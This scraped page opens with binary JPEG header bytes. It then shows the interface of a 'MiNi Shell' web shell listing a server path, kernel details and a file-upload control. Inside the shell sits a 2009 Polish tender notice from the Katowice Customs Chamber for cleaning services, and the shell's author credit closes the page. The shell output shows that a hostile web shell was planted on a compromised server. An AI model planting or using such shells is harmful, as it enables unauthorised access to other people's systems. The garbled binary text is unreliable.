JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/67428-N-2009.html

<p class="kh_header"><b>Katowice: Sprzątanie pomieszczeń użytkowanych przez Izbę Celna w Katowicach.</b><br>
<b>Numer ogłoszenia: 67428 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Katowicach , Plac Grunwaldzki 8-10, 40-127 Katowice, woj. śląskie, tel. 032 3587161, faks 032 3587204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń użytkowanych przez Izbę Celna w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonawca winien wykonywać przedmiot niniejszego zamówienia z należytą starannością, zgodnie z wszystkimi wymaganiami Zamawiającego wskazanymi w niniejszej SIWZ. 
Ogólem powierzchnia stanowiaca przedmiot zamówienia wynosi 11 435,67 m2
Zakres usług sprzątania i utrzymania w ciągłej czystości siedzib Zamawiającego:
-	codzienne zmywanie posadzek we wszystkich pomieszczeniach, za wyjątkiem tych dla których została określona  inna częstotliwość,
-	codziennie odkurzanie powierzchni dywanowych,
-	codzienne odkurzanie na mokro wszelkich ruchomości (za wyjątkiem sprzętu komputerowego oraz tych dla których została określona inna częstotliwość) i urządzeń znajdujących się w sprzątanych pomieszczeniach oraz gablot,  tablic znajdujących się w ciągach komunikacyjnych, ławek dla stron 
-	codzienne opróżnianie koszy ze śmieci oraz w miarę potrzeby niszczarek.
-	wyrzucanie makulatury pozostawionej w wyznaczonym w tym celu miejscu,
-	codzienne mycie środkami dezynfekującymi urządzeń sanitarnych oraz posadzek w pomieszczeniach sanitarnych,
-	2 x w miesiącu mycie pomieszczeń archiwum,
-	2 x w miesiącu mycie pomieszczeń gospodarczych, technicznych (serwerowi), 
-	1 x w miesiącu mycie ścian glazurowanych lub malowanych emalią w pomieszczeniach sanitarnych,
-	1 x w miesiącu (zawsze w pierwszym tygodniu m-ca) sprzątanie (powierzchni magazynowej, biurowej i pozostałej) Magazynu Depozytowo - Likwidacyjnego mieszczącego się w Katowicach przy ul. Roździeńskiego 188.
-	1 x w miesiącu (zawsze w pierwszym tygodniu m-ca) sprzątanie piwnicy w UC w Rybniku,  
-	1 x w kwartale(zawsze w pierwszym m-cu kwartału) pastowanie i froterowanie podłóg,
-	1 x w kwartale (zawsze w pierwszym m-cu kwartału) mycie powierzchni pionowych (drzwi, luster, fasady szklane itp.) 
-	1 x w kwartale chemiczne czyszczenie dywanów, chodników, wykładzin i wszelkiej tapicerki meblowej (konkretny termin należy uzgodnić z naczelnikiem / kierownikiem danej jednostki organizacyjnej), 
-	2 x  w roku mycie okien,  w okresach: z początkiem wiosny i przed okresem zimowym.
 
W cenie oferty należy ująć wszystkie środki czystości niezbędne do wykonywania usługi sprzątania, jak również materiały eksploatacyjne takie jak: worki foliowe do koszy na śmieci, niszczarek,  wkłady do muszli klozetowych i pisuarów (nie należy wyposażać toalet w mydło, ręczniki papierowe i papier toaletowy) oraz koszty eksploatacji wszystkich urządzeń niezbędnych do wykonywania usługi stanowiącej przedmiot zamówienia.

Wszystkie środki czystości oraz materiały eksploatacyjne używane przez Wykonawcę przy wykonaniu zamówienia muszą posiadać atest dopuszczający do użytkowania jak również aktualny termin ważności. Na żądanie Zamawiającego, w każdym czasie trwania umowy, Wykonawca winien przedłożyć atesty stosowanych środków czystości.

Ponadto, Zamawiający zastrzega, że w ramach usługi należy wykonywać wszelkie prace związane ze sprzątaniem po malowaniu lub remoncie.     

Zamawiający wymaga aby Wykonawca wyposażył osoby sprzątające w środki, materiały oraz urządzenia niezbędne do wykonania usługi, jak również przekazał każdej osobie sprzątającej identyfikator zawierający m.in. imię i nazwisko oraz nazwę Wykonawcy. Identyfikatory winne być noszone w widocznym miejscu, przez osoby sprzątające przy wykonywaniu zadań.
Zamawiający, w każdym obiekcie, udostępni Wykonawcy pomieszczenie (socjalno-magazynowe), a tam gdzie to nie jest możliwe zaproponuje pomieszczenie do współużytkowania. 

Zamawiający informuje, że wszystkie obiekty zajmowane przez niego są ogólnie dostępne i wizję można przeprowadzić w godzinach urzędowania danej jednostki organizacyjnej.

Jednakże, jeżeli Wykonawca zgłasza chęć przeprowadzenia wizji w obecności przedstawiciela Zamawiającego winien przesłać pisemne zgłoszenie na numer faksu (032) 358-72-04. Zgłoszenie winno zawierać m.in.:
	-	imię i nazwisko osoby która będzie reprezentować Wykonawcę,
	
 Po otrzymaniu zgłoszenia, Zamawiający wyznaczy imiennie funkcjonariusza, który będzie Wykonawcy towarzyszył w trakcie wizji.
       
Zamawiający zastrzega sobie, w czasie trwania umowy, prawo zmniejszenia metrażu powierzchni sprzątanej oraz prawo zmiany godzin świadczenia usługi sprzątania. 
. 
Zamawiający przewiduje możliwość udzielenia Wykonawcy zamówień uzupełniających, stanowiących nie więcej niż 10% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju usług, dotyczących przedmiotu zamówienia niniejszego postępowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.13.00-0, 90.91.92.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie pobiera się<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do realizacji przedmiotu zamówienia,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponuję potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy. 
Wymienione warunki udziału w postępowaniu dotyczą każdego z Wykonawców, którzy ubiegają się o udzielenie zamówienia publicznego. Przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego należy także rozumieć Wspólników spółek cywilnych. 
    
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia -   nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> .  Na spełnienie warunków udziału w postępowaniu wymagane są następujące dokumenty:
1)	aktualny wypis / odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy  wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej wystawionego  nie wcześniejszą niż 6 m-cy przed upływem terminu składania oferty.
2)	podpisane oświadczenie Wykonawcy że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy i spełnia warunki określone w art. 22 ust. 1 ustawy - wg załącznika nr 2 do SIWZ,
3)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
5)	oświadczenie Wykonawcy, że przez cały okres trwania umowy posiadać będzie polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (polisa OC) na  kwotę, za jedno zdarzenie nie mniejszą  niż 100.000,00 złotych - zał. Nr 4 do SIWZ,
6)	wykaz wykonanych lub wykonywanych usług  -zał. Nr 3 do SIWZ  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Co najmniej dwie z wymienionych usług powinny być o wartości przekraczającej 250 000,00 zł brutto - do wykazu należy załączyć referencje potwierdzające należyte wykonanie.
7)	dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
2.	Podmioty występujące wspólnie, oprócz wyżej wymienionych dokumentów winny złożyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu o którym mowa w pkt. 1.1 i 1.3 składa dokument wystawiony w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Jakość świadczonych usług - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.katowice.ic.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Katowicach, 40-127 Katowice, Pl. Grunwaldzki 8-10 II piętro pok. 250.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2009 godzina 10:00, miejsce: Izba Celna w Katowicach, 40-127 Katowice, Pl. Grunwaldzki 8-10 II piętro pok. 222.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com